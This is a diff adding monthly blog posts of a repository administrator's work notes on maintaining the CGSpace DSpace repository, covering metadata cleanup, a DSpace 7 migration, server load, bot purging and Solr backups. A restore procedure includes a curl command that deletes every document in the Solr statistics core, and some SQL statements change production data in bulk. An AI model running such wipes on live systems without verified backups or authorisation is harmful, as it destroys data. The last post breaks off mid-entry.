- This GREL extracts the _text_ content of the `<jats:p>` tags (ie, no other JATS XML markup tags like `<jats:i>`, `<jats:sub>`, etc):
```console
forEach(value.parseXml().select("jats|p"),i,i.xmlText()).join("")
```
- Note that we need to use `select("jats|p")` instead of `select("jats:p")` for OpenRefine's parseXml, and we need to `join()` on the end
- I updated metadata for about 3,000 items using Crossref metadata
- I stripped trailing periods for titles where they were missing on the Crossref titles
- I copied abstracts for about 600 items that were missing them, for items that were Creative Commons
- I updated publishers for a few thousand more where ours and Crossref disagreed, checking a handful manually first
- I also added subjects to the `crossref_doi_lookup.py` script to see if they will be useful for us
- When checking with csv-metadata-quality I can validate those subjects against AGROVOC and add them if they are valid
## 2023-10-03
- I added the item type to the collection subscription email on DSpace 6
- It's done differently on DSpace 7 so I'll have to see how to do it there...
- Test a patch that fixes a bug with item versioning disabled in DSpace 7
- I hadn't realized that DSpace 7 defaulted to versioning being enabled, whereas we never used this in DSpace 6 (yet)
- Submit [an issue regarding duplicate Discovery sort fields](https://github.com/DSpace/DSpace/issues/9104) in DSpace 7
## 2023-10-05
- Some discussion this week about issue and online dates for journal articles, with regards to PRMS
- I looked more closely at the [Crossref API docs](https://github.com/CrossRef/rest-api-doc/blob/master/api_format.md) and realized (again) that their "issue" date is not the same as our issue date—they take the earlier of the print and online dates!
- Also, *very many* items have no print date at all, perhaps due to delays, errors, or simply because the journal is "online only"!
- I suggested again that PRMS should consider both, and take the earlier of the two, then make sure whether the date is in the current reporting period
- I managed to find 80 items with print publishing dates from 2023 and updated those from Crossref, but for the rest we will have to think about how we handle them
## 2023-10-06
- More discussion about dates after looking closely at them yesterday and today
- Crossref doesn't always have both issued and online dates—sometimes they have one, sometimes the other, and sometimes both, so we cannot rely on them 100% for that.
- In some cases, the item is available online for months (or even a year!), but has not been included in an issue yet, and thus has no "issue" date, for example:
- https://doi.org/10.1002/csc2.20914 <--- published online January 2023!
- https://doi.org/10.1111/mcn.13401 <--- published online July 2022!
- Even journals make mistakes: this journal article was "issued" in 2022, but online in 2023! This is not Crossref's fault, but the journal's!
- https://doi.org/10.1186/s40066-022-00400-6
- I found a bunch more strange cases regarding dates and recommended to PRMS team that they use the earlier of the issued and online dates
- Meet with Aditi to start discussing the scope of knowledge products we can get for the CGIAR climate change synthesis
## 2023-10-07
- I spent a few hours (!) debugging an issue in Python when downloading PDFs
- I think it ended up being due to `requests_cache`!!! Grrrr
- On a positive note I've greatly refactored my script for discovering and downloading PDFs from Unpaywall
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-10-08
- Starting to see some stuck locks on CGSpace this morning
- I will give notice and restart CGSpace
- Work on Python script to harvest DSpace REST API and save to CSV
## 2023-10-11
- File an issue on the DSpace issue tracker regarding the MaxMind JSON objects in our Solr statistics: https://github.com/DSpace/DSpace/issues/9118
## 2023-10-12
- Discuss MODS issues in CGSpace's OAI-PMH with Stefano and Valentina
- AGRIS can currently only support MODS 3.7 so they need us to roll our 3.8 work from 2023-06 back down, which requires some minor changes to the crosswalk
## 2023-10-13
- I did some more minor work to get the MODS 3.7 changes ready for AGRIS on DSpace Test
## 2023-10-14
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- I deployed the AGRIS changes for OAI-PMH on CGSpace
## 2023-10-16
- Fix some typos in ILRI subjects on CGSpace
- These were affecting the taxonomy on ilri.org
- I exported CGSpace and did some validation and cleanup on ILRI subjects, moving some to AGROVOC subjects
- Port the MODS 3.7 crosswalk from DSpace 6 to DSpace 7
- It works fine, we only need to take note that the OAI-PMH endpoint is now relative to the `/server` path instead of a dedicated OAI path
## 2023-10-17
- Export CGSpace to do some cleanups all over on invalid metadata values
- I found many metadata values in the wrong field, wrong format, etc
- This ended up being cleanups for 694 items
## 2023-10-20
- Export CGSpace to check for missing Initiative collection mappings
- I also did a run of looking up all Initiative outputs with DOIs against Crossref to check for missing dates, publishers, etc
- I found issued dates for a few, and online dates for over 100
- I also fixed some incorrect licenses, access status, and abstracts
## 2023-10-23
- Export a list of Internal Documents for Peter to review to see if we can re-classify some
- Peter sent changes for 740 items so I applied them on CGSpace
- Testing the changes for OpenRXV DSpace 7 compatibility
## 2023-10-24
- Sync DSpace 7 Test with a fresh CGSpace snapshot
- Meeting with FARA to discuss DSpace training and support
- Meeting with IFPRI about migrating to CGSpace
## 2023-10-25
- Maria was asking about an error deleting an item in the Alliance community
- The error was "Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:..."
- According to my notes this error happened a few times in the past and is some kind of corner case regarding permissions
- I deleted the item for her
- I deleted a handful of old CRP groups on CGSpace
## 2023-10-27
- Peter sent me a list of journal articles from Altmetric that have an ILRI affiliation, but no Handle
- I used my `crossref_doi_lookup.py` script to fetch the metadata for them using their DOIs, then did a bunch of cleanup in OpenRefine
- Test some LDAP patches for DSpace 7
## 2023-10-30
- Some work on metadata for Aditi's review
- I found more preprints grrrr
## 2023-10-31
- Peter got back to me with the cleanups on ILRI journal articles from Altmetric that we didn't have on CGSpace
- I did another duplicate check and found four more duplicates that had been uploaded yesterday
- Then I did a quick sanity check and uploaded the remaining 19 items to CGSpace
<!-- vim: set sw=2 ts=2: -->

215
content/posts/2023-11.md Normal file
View File

@ -0,0 +1,215 @@
---
title: "November, 2023"
date: 2023-11-02T12:59:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-11-01
- Work a bit on the ETL pipeline for the CGIAR Climate Change Synthesis
- I improved the filtering and wrote some Python using pandas to merge my sources more reliably
## 2023-11-02
- Export CGSpace to check missing Initiative collection mappings
- Start a harvest on AReS
<!--more-->
- IFPRI contacted us about importing their Slideshare presentations to CGSpace
- There are ~1,700 of them and date back to as early as 2008
- I did a quick cleanup of the metadata export from Slideshare (including tagging with some AGROVOC in OpenRefine) and uploaded to DSpace Test
## 2023-11-03
- A little bit of work on the CGIAR Climate Change Synthesis
- Discuss some CGSpace migration plans with Leigh from IFPRI
- For their Slideshare content we agreed:
- Exclude private
- Exclude deleted
- Exclude non presentation types
- Exclude duplicates within the collection for now until we can sort them out
- That leaves about 1,500 items out of the 1,700
- I did a duplicate check against CGSpace and found 44 items with 1.0 similarity so I removed those
## 2023-11-04
- Export CGSpace to check for missing Initiative collection mappings
- I ran through the list of potential duplicates on the IFPRI Slideshare presentations
## 2023-11-05
- Work with Salem to migrate AReS to the new version
## 2023-11-07
- DSpace 7 Test went down and there is very high load on the server
- I saw very high load from Java but didn't have time to check exactly what was wrong so I just rebooted the host
- A few hours after restarting the system went down again, with very high load from Java again
- I see lots of messages like this in the Tomcat log:
```
tomcat9[732]: [9955.662s][info ][gc] GC(6291) Pause Full (G1 Compaction Pause) 4085M->4080M(4096M) 677.251ms
tomcat9[732]: [9955.662s][info ][gc] GC(6290) Concurrent Mark Cycle 677.558ms
tomcat9[732]: [9955.666s][info ][gc] GC(6292) To-space exhausted
```
- I see some messages in `dspace.log` about heap space:
```
Caused by: java.lang.OutOfMemoryError: Java heap space
```
- I will increase Tomcat's heap from 4096m to 5120m
- A few hours later it happened again, so I increased the heap from 5120m to 6144m
- Not sure what's going on today...
- I tested moving the CGIAR Fund Council community to the CGIAR historic archive on DSpace Test:
```console
$ dspace community-filiator -r -p 10568/83389 -c 10947/2516
$ dspace community-filiator -s -p 10947/2515 -c 10947/2516
$ dspace index-discovery -r 10947/2516
$ dspace index-discovery -r 10947/2515
$ dspace index-discovery -r 10568/83389
$ dspace index-discovery
```
- I think this is the minimal we can do to avoid a full Discovery reindex which is very expensive
- I helped Maria resize some massive PDFs for upload to CGSpace using GhostScript prepress mode as I had done before in [September, 2023]({{< relref "2023-09.md" >}}),
## 2023-11-08
- DSpace 7 Test has very high load again and I see more Java heap space errors in the log
```console
# grep -c 'Caused by: java.lang.OutOfMemoryError: Java heap space' /home/dspace7/log/dspace.log-2023-11-07
35
# grep -c 'Caused by: java.lang.OutOfMemoryError: Java heap space' /home/dspace7/log/dspace.log
7
```
- I don't know what is happening... I will increase the heap size from 6144m to 7168m again...
- I did some work on the value mappings in AReS
- I wanted to test the import/export feature, and found that I could get a JSON and convert it to CSV for manipulation in OpenRefine
- Importing duplicates records, so I deleted and re-created the index in Elasticsearch first
- Then I started a new harvest on AReS to make sure the mappings are applied
## 2023-11-09
- Ryan asked me for help uploading a large PDF to CGSpace
- I tried my usual GhostScript preprint invocation and found the size decrease significantly, but some minor artifacts appeared in the images
- Interestingly, the [GhostScript docs](https://ghostscript.com/docs/9.54.0/VectorDevices.htm) mention that `prepress` doesn't give the best results:
> Please be aware that the /prepress setting does not indicate the highest quality conversion. Using any of these presets will involve altering the input, and as such may result in a PDF of poorer quality (compared to the input) than simply using the defaults. The 'best' quality (where best means closest to the original input) is obtained by not setting this parameter at all (or by using /default).
- Also, I found [a question on StackOverflow discussing some further techniques for PDFs with images](https://stackoverflow.com/questions/40849325/ghostscript-pdfwrite-specify-jpeg-quality):
```console
$ gs -sOutputFile=137166-default-dct.pdf -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dNOPAUSE -dBATCH -dPDFSETTINGS=/default -c "<< /ColorACSImageDict << /VSamples [ 1 1 1 1 ] /HSamples [ 1 1 1 1 ] /QFactor 0.08 /Blend 1 >> /ColorImageDownsampleType /Bicubic /ColorConversionStrategy /LeaveColorUnchanged >> setdistillerparams" -f 137166.pdf
```
- This looks much better, and is still much smaller than the original
- Also, I used `pdfimages` to extract all the images from the original and the one above and found:
```console
$ du -sh images-*
886M images-default-dct
1012M images-original
```
- And from [WeCompress's analysis](https://www.wecompress.com/en/analyze) I see that the images are 85% of the size of the PDF
## 2023-11-10
- I finished checking the IFPRI Slideshare records and added some tagging of countries, regions, and CRPs and then uploaded them to CGSpace
## 2023-11-11
- Salem fixed a bug on OpenRXV that was splitting country values by "," before matching them with ISO countries
- I exported CGSpace to check for missing Initiative collection mappings
- Start a fresh harvest on AReS
## 2023-11-16
- Discuss mapping ICARDA outputs from Initiatives to ICARDA collections on CGSpace
- I added MEL's CGSpace user to the administrator group of a handful of collections
- I also did a batch mapping of 274 existing Initiative outputs from ICARDA to the relevant collections
## 2023-11-18
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-11-22
- I was checking out the [DSpace 7 statistics](https://github.com/DSpace/RestContract/blob/main/statistics-reports.md) again and found that we have total visits and total downloads for each DSpace object, for example [this item](https://dspace7test.ilri.org/items/3f1b9605-f5ff-4bbb-8c89-d6fe4157f748):
- TotalVisits: https://dspace7test.ilri.org/server/api/statistics/usagereports/3f1b9605-f5ff-4bbb-8c89-d6fe4157f748_TotalVisits
- TotalDownloads: https://dspace7test.ilri.org/server/api/statistics/usagereports/3f1b9605-f5ff-4bbb-8c89-d6fe4157f748_TotalDownloads
- And the numbers match those in my dspace-statisitcs-api *exactly*!
- This can be useful to get an individual DSpace object's stats, but there is no way to iterate over all objects like all items...
- We can look at using this to draw stats on the community, collection, and item pages
## 2023-11-23
- Brian King was asking me how many PDFs we had in CGSpace so I got a rough estimate using this SQL query:
```console
localhost/dspace7= ☘ SELECT COUNT(uuid) FROM bitstream WHERE bitstream_format_id=(SELECT bitstream_format_id FROM bitstreamformatregistry WHERE mimetype='application/pdf');
count
───────
47818
(1 row)
```
- It's been some time since I looked at our Solr statistics to find new bots
- I found a few new ones that I [submitted to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/60) and added to our local bot list:
- GuzzleHttp/7
- Owler@ows.eu/1
- newspaperjs
- I ran my old `check-spider-hits.sh` script with a list of bots from our local overrides to purge hits from Solr:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 30 hits from ubermetrics in statistics
Purging 59 hits from curb in statistics
Purging 36 hits from bitdiscovery in statistics
Purging 87 hits from omgili in statistics
Purging 47 hits from Vizzit in statistics
Purging 109 hits from Java\/17-ea in statistics
Purging 40 hits from AdobeUxTechC4-Async in statistics
Purging 21 hits from ZaloPC-win32-24v473 in statistics
Purging 21 hits from nbertaupete95 in statistics
Purging 52 hits from Scoop\.it in statistics
Purging 16 hits from WebAPIClient in statistics
Purging 241 hits from RStudio in statistics
Purging 1255 hits from ^MEL in statistics
Purging 47850 hits from GuzzleHttp in statistics
Purging 8714 hits from Owler in statistics
Purging 1083 hits from newspaperjs in statistics
Purging 369 hits from ^Chrome$ in statistics
Purging 1474 hits from curl in statistics
Total number of bot hits purged: 61504
```
- I also noticed 35,000 requests over the past few years from lowercase user agents, which is [definitely weird](https://developers.whatismybrowser.com/api/features/user-agent-checks/weird/#all_lower_case), for example:
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/89.0.4389.90 safari/537.36`
- `mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/90.0.4430.93 safari/537.36`
- I'm gonna add those to our overrides and purge them:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 35816 hits from ^mozilla in statistics
Total number of bot hits purged: 35816
```
## 2023-11-30
- Minor updates to our OAI MODS crosswalk
- Stefano found a minor markup issue with our alternative titles (`<titleInfo>` tag)
- Very high load on CGSpace since after lunch
- I killed some locks that had been stuck for a few hours
<!-- vim: set sw=2 ts=2: -->

271
content/posts/2023-12.md Normal file
View File

@ -0,0 +1,271 @@
---
title: "December, 2023"
date: 2023-12-01T08:48:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-12-01
- There is still high load on CGSpace and I don't know why
- I don't see a high number of sessions compared to previous days in the last few weeks
<!-- more -->
```console
$ for file in dspace.log.2023-11-[23]*; do echo "$file"; grep -a -oE 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
dspace.log.2023-11-20
22865
dspace.log.2023-11-21
20296
dspace.log.2023-11-22
19688
dspace.log.2023-11-23
17906
dspace.log.2023-11-24
18453
dspace.log.2023-11-25
17513
dspace.log.2023-11-26
19037
dspace.log.2023-11-27
21103
dspace.log.2023-11-28
23023
dspace.log.2023-11-29
23545
dspace.log.2023-11-30
21298
```
- Even the number of unique IPs is not very high compared to the last week or so:
```console
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.1 | sort | uniq | wc -l
17023
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.2.gz | sort | uniq | wc -l
17294
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.3.gz | sort | uniq | wc -l
22057
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.4.gz | sort | uniq | wc -l
32956
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.5.gz | sort | uniq | wc -l
11415
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.6.gz | sort | uniq | wc -l
15444
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log.7.gz | sort | uniq | wc -l
12648
```
- It doesn't make any sense so I think I'm going to restart the server...
- After restarting the server the load went down to normal levels... who knows...
- I started trying to see how I'm going to generate the fake statistics for the Alliance bitstream that was replaced
- I exported all the statistics for the owningItem now:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/stats-export.json -f 'owningItem:b5862bfa-9799-4167-b1cf-76f0f4ea1e18' -k uid
```
- Importing them into DSpace Test didn't show the statistics in the Atmire module, but I see them in Solr...
## 2023-12-02
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-12-04
- Send a message to Altmetric support because the item IWMI highlighted last month still doesn't show the attention score for the Handle after I tweeted it several times weeks ago
- Spent some time writing a Python script to fix the literal MaxMind City JSON objects in our Solr statistics
- There are about 1.6 million of these, so I exported them using solr-import-export-json with the query `city:com*` but ended up finding many that have missing bundles, container bitstreams, etc:
```
city:com* AND -bundleName:[* TO *] AND -containerBitstream:[* TO *] AND -file_id:[* TO *] AND -owningItem:[* TO *] AND -version_id:[* TO *]
```
- (Note the negation to find fields that are missing)
- I don't know what I want to do with these yet
## 2023-12-05
- I finished the `fix_maxmind_stats.py` script and fixed 1.6 million records and imported them on CGSpace after testing on DSpace 7 Test
- Altmetric said there was a glitch regarding the Handle and DOI linking and they successfully re-scraped the item page and linked them
- They sent me a list of current production IPs and I notice that some of them are in our nginx bot network list:
```console
$ for network in $(csvcut -c network /tmp/ips.csv | sed 1d | sort -u); do grepcidr $network ~/src/git/rmg-ansible-public/roles/dspace/files/nginx/bot-networks.conf; done
108.128.0.0/13 'bot';
46.137.0.0/16 'bot';
52.208.0.0/13 'bot';
52.48.0.0/13 'bot';
54.194.0.0/15 'bot';
54.216.0.0/14 'bot';
54.220.0.0/15 'bot';
54.228.0.0/15 'bot';
63.32.242.35/32 'bot';
63.32.0.0/14 'bot';
99.80.0.0/15 'bot'
```
- I will remove those for now so that Altmetric doesn't have any unexpected issues harvesting
## 2023-12-08
- Finalized the script to generate Solr statistics for Alliance research Mirjam
- The script is `ilri/generate_solr_statistics.py`
- I generated ~3,200 statistics based on her records of the download statistics of [that item](https://hdl.handle.net/10568/131997) and imported them on CGSpace
- Did some work on the DSpace 7 submission form
- Peter asked for lists of affiliations, investors, and publishers to do some cleanups
- I generated a list from a CSV export instead of doing it based on a SQL dump...
```console
$ csvcut -c 'cg.contributor.affiliation[en_US]' /tmp/initiatives.csv \
| sed -e 1d -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' -e '/^$/d' \
| sort | uniq -c | sort -hr \
| awk 'BEGIN { FS = "^[[:space:]]+[[:digit:]]+[[:space:]]+" } {print $2}'\
| sed -e '1i cg.contributor.affiliation' -e 's/^\(.*\)$/"\1"/' \
> /tmp/2023-12-08-initiatives-affiliations.csv
```
- Export a list of authors as well:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT text_value AS "dc.contributor.author", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 3 GROUP BY "dc.contributor.author" ORDER BY count DESC) to /tmp/2023-12-08-authors.csv WITH CSV HEADER;
COPY 102435
```
## 2023-12-11
- Work on OpenRXV dependencies and podman a bit
- Peter noticed that the statistics for this month are very very low on CGSpace
- I don't know what is going on, perhaps it is related to me adjusting the nginx config last week?
- Ah, it's probably because of the spider patterns I updated on 2023-11
## 2023-12-16
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-12-17
- Pull latest master branch for OpenRXV and deploy on the server
- I threw away some changes in the tree regarding the Angular base ref, and it broke AReS
- So note to self: we need to set the base ref in `frontend/Dockerfile` before building!
- Now Salem fixed the country map
## 2023-12-18
- Work a bit on the IFPRI-ISNAR archive from Leigh
- More work on the DSpace 7 home page
## 2023-12-19
- More work on the DSpace 7 home page
- The Alliance TIP team is testing deposits to the DSpace 7 REST API and getting an HTTP 500 error
- In the DSpace logs I see this after they log in, create the item, and update the metadata:
```
2023-12-19 17:49:28,022 ERROR unknown unknown org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
```
- I found some messages on the dspace-tech mailing list suggesting this might be an old bug: https://groups.google.com/g/dspace-tech/c/My1GUFYFGoU/m/tS7-WAJPAwAJ
- I restarted Tomcat and told the Alliance TIP team to try again
## 2023-12-20
- The Alliance guys said that submitting via REST works now... sigh, so that's just some old DSpace 5/6 REST API bug
- I lowercased all our AGROVOC keywords in `dcterms.subject` in SQL:
```console
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 462
dspace=*# COMMIT;
COMMIT
```
## 2023-12-25
- Looking into [Solr backups](https://solr.apache.org/guide/8_11/making-and-restoring-backups.html)
- Since we are not running in Solr Cloud mode we need to use the replication endpoint for Solr standalone
- This works:
```console
$ curl 'http://localhost:8983/solr/statistics/replication?command=backup'
{
"responseHeader":{
"status":0,
"QTime":26},
"status":"OK"}
```
- Then I saw the size of the snapshot reach the size of the index...
```console
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
16G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
20G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
21G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
# du -sh /var/solr/data/configsets/statistics/data/*
22G /var/solr/data/configsets/statistics/data/index
22G /var/solr/data/configsets/statistics/data/snapshot.20231225074111671
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
```
- Then I deleted the core and restored from the snapshot backup:
```console
$ curl http://localhost:8983/solr/statistics/update -H "Content-type: text/xml" --data-binary '<delete><query>*:*</query></delete>'
$ curl http://localhost:8983/solr/statistics/update -H "Content-type: text/xml" --data-binary '<commit />'
$ curl 'http://localhost:8983/solr/statistics/replication?command=restore&name=statistics'
```
- Interestingly the import worked fine, but created a new data index:
```console
# du -sh /var/solr/data/configsets/statistics/data/*
4.0K /var/solr/data/configsets/statistics/data/index.properties
22G /var/solr/data/configsets/statistics/data/restore.20231225154626463
4.0K /var/solr/data/configsets/statistics/data/snapshot_metadata
22G /var/solr/data/configsets/statistics/data/snapshot.statistics
```
- Not sure the implications of that—Solr uses the data just fine
- I can surely use this for atomic Solr backups
## 2023-12-27
- Delete duplicate metadata as described in my DSpace issue from last year: https://github.com/DSpace/DSpace/issues/8253
- Do some other metadata cleanups on CGSpace
- I also looked up our DOIs on Crossref to get some missing abstracts and correct licenses and dates
- Some minor work on the CGSpace DSpace 7 theme to fix the navbar on mobile
- Some work on the IFPRI ISNAR archive
## 2023-12-28
- I started porting the [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) to DSpace 7
- Some work on the IFPRI ISNAR archive
- I ended up going through most of the PDFs to get better dates and abstracts
## 2023-12-29
- I created a new Hetzner server to replace the current DSpace 6 CGSpace next week when we migrate to DSpace 7
- Interesting, I haven't checked for content pointing to legacy domains in several years (!)
- `inurl:mahider.cgiar.org`: 0 results on Google!
- `inurl:mahider.ilri.org`: 2,100 results on Google
- `inurl:mahider.ilri.org inurl:https`: 2 results on Google (!)
- `inurl:dspace.ilri.org:` 1,390 results on Google
- `inurl:dspace.ilri.org inurl:https`: 0 results on Google (!)
- So it seems I can do away with the HTTPS virtual hosts finally
- Well my current certificates expired on 2021-02-13 and nobody noticed... so...
<!-- vim: set sw=2 ts=2: -->

430
content/posts/2024-01.md Normal file
View File

@ -0,0 +1,430 @@
---
title: "January, 2024"
date: 2024-01-02T10:08:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-01-02
- Work on preparation of new server for DSpace 7 migration
- I'm not quite sure what we need to do for the Handle server
- For now I just ran the `dspace make-handle-config` script and diffed it with the one from DSpace 6
- I sent the bundle to the Handle admins to make sure it's OK before we do the migration
- Continue testing and debugging the cgspace-java-helpers on DSpace 7
- Work on IFPRI ISNAR archive cleanup
<!--more-->
## 2024-01-03
- I haven't heard from the Handle admins so I'm preparing a backup solution using nginx streams
- This seems to work in my simple tests (this must be outside the `http {}` block):
```
stream {
upstream handle_tcp_9000 {
server 188.34.177.10:9000;
}
server {
listen 9000;
proxy_connect_timeout 1s;
proxy_timeout 3s;
proxy_pass handle_tcp_9000;
}
}
```
- Here I forwarded a test TCP port 9000 from one server to another and was able to retrieve a test HTML that was running on the target
- I will have to do TCP and UDP on port 2641, and TCP/HTTP on port 8000.
- I did some more minor work on the IFPRI ISNAR archive
- I got some PDFs from the UMN AgEcon search and fixed some metadata
- Then I did some duplicate checking and found five items already on CGSpace
## 2024-01-04
- Upload 692 items for the ISNAR archive to CGSpace: https://cgspace.cgiar.org/handle/10568/136192
- Help Peter proof and upload 252 items from the 2023 Gender conference to CGSpace
- Meeting with IFPRI to discuss their migration to CGSpace
- We agreed to add two new fields, one for IFPRI project and one for IFPRI publication ranking
- Most likely we will use `cg.identifier.project` as a general field and consolidate other project fields there
- Not sure which field to use for the publication rank...
## 2024-01-05
- Proof and upload 51 items in bulk for IFPRI
- I did a big cleanup of user groups in anticipation of complaints about slow workflow tasks etc in DSpace 7
- I removed ILRI editors from all the dozens of CCAFS community and collection groups, and I should do the same for other CRPs since they are closed for two years now
## 2024-01-06
- Migrate CGSpace to DSpace 7
## 2024-01-07
- High load on the server and UptimeRobot saying the frontend is flapping
- I noticed tons of logs from pm2 in the systemd journal, so I disabled those in the systemd unit because they are available from pm2's log directory anyway
- I also noticed the same for Solr, so I disabled stdout for that systemd unit as well
- I spent a lot of time bringing back the nginx rate limits we used in DSpace 6 and it seems to have helped
- I see some client doing weird HEAD requests to search pages:
```
47.76.35.19 - - [07/Jan/2024:00:00:02 +0100] "HEAD /search/?f.accessRights=Open+Access%2Cequals&f.actionArea=Resilient+Agrifood+Systems%2Cequals&f.author=Burkart%2C+Stefan%2Cequals&f.country=Kenya%2Cequals&f.impactArea=Climate+adaptation+and+mitigation%2Cequals&f.itemtype=Brief%2Cequals&f.publisher=CGIAR+System+Organization%2Cequals&f.region=Asia%2Cequals&f.sdg=SDG+12+-+Responsible+consumption+and+production%2Cequals&f.sponsorship=CGIAR+Trust+Fund%2Cequals&f.subject=environmental+factors%2Cequals&spc.page=1 HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.2504.63 Safari/537.36"
```
- I will add their network blocks (AS45102) and regenerate my list of bot networks:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS55286 \
https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS45102 \
https://asn.ipinfo.app/api/text/list/AS21859
$ cat AS* | sort | uniq | wc -l
4897
$ cat AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
$ wc -l /tmp/networks.txt
2017 /tmp/networks.txt
```
- I'm surprised to see the number of networks reduced from my current ones... hmmm.
- I will also update my list of Bing networks:
```console
$ ./ilri/bing-networks-to-ips.sh
$ ~/go/bin/mapcidr -a < /tmp/bing-ips.txt > /tmp/bing-networks.txt
$ wc -l /tmp/bing-networks.txt
250 /tmp/bing-networks.txt
```
## 2024-01-08
- Export list of publishers for Peter to select some amount to use as a controlled vocabulary:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT text_value AS "dcterms.publisher", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 178 GROUP BY "dcterms.publisher" ORDER BY count DESC) to /tmp/2024-01-publishers.csv WITH CSV HEADER;
COPY 4332
```
- Address some feedback on DSpace 7 from users, including fileing some issues on GitHub
- https://github.com/DSpace/dspace-angular/issues/2730: List of available metadata fields is truncated when adding new metadata in "Edit Item"
- The Alliance TIP team was having issues posting to one collection via the legacy DSpace 6 REST API
- In the DSpace logs I see the same issue that they had last month:
```
ERROR unknown unknown org.dspace.rest.Resource @ Something get wrong. Aborting context in finally statement.
```
## 2024-01-09
- I restarted Tomcat to see if it helps the REST issue
- After talking with Peter about publishers we decided to get a clean list of the top ~100 publishers and then make sure all CGIAR centers, Initiatives, and Impact Platforms are there as well
- I exported a list from PostgreSQL and then filtered by count > 40 in OpenRefine and then extracted the metadata values:
```
$ csvcut -c dcterms.publisher ~/Downloads/2024-01-09-publishers4.csv | sed -e 1d -e 's/"//g' > /tmp/top-publishers.txt
```
- Export a list of ORCID identifiers from PostgreSQL to look them up on ORCID and update our controlled vocabulary:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=247) to /tmp/2024-01-09-orcid-identifiers.txt;
localhost/dspace7= ☘ \q
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/2024-01-09-orcid-identifiers.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2024-01-09-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2024-01-09-orcids.txt -o /tmp/2024-01-09-orcids-names.txt -d
```
- Then I updated existing ORCID identifiers in CGSpace:
```
$ ./ilri/update_orcids.py -i /tmp/2024-01-09-orcids-names.txt -db dspace -u dspace -p bahhhh
```
- Bizu seems to be having issues due to belonging to too many groups
- I see some messages from Solr in the DSpace log:
```
